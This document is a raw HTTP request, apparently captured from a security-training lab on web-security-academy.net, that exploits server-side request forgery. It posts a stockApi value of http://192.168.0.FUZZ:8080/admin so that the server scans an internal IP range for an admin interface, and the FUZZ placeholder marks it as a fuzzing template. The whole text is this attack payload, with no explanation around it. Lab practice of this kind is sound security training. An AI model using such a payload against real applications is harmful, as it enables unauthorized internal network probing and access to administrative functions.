POST /product/stock HTTP/2
Host: 0a41005e036d9c9f829f5c5200af00b5.web-security-academy.net
Cookie: session=YcGc33Z9vfJaNclM8hX10bg90GRFMUN4
Content-Length: 35
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Chromium";v="137", "Not/A)Brand";v="24"
Content-Type: application/x-www-form-urlencoded
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: */*
Origin: https://0a41005e036d9c9f829f5c5200af00b5.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a41005e036d9c9f829f5c5200af00b5.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

stockApi=http://192.168.0.FUZZ:8080/admin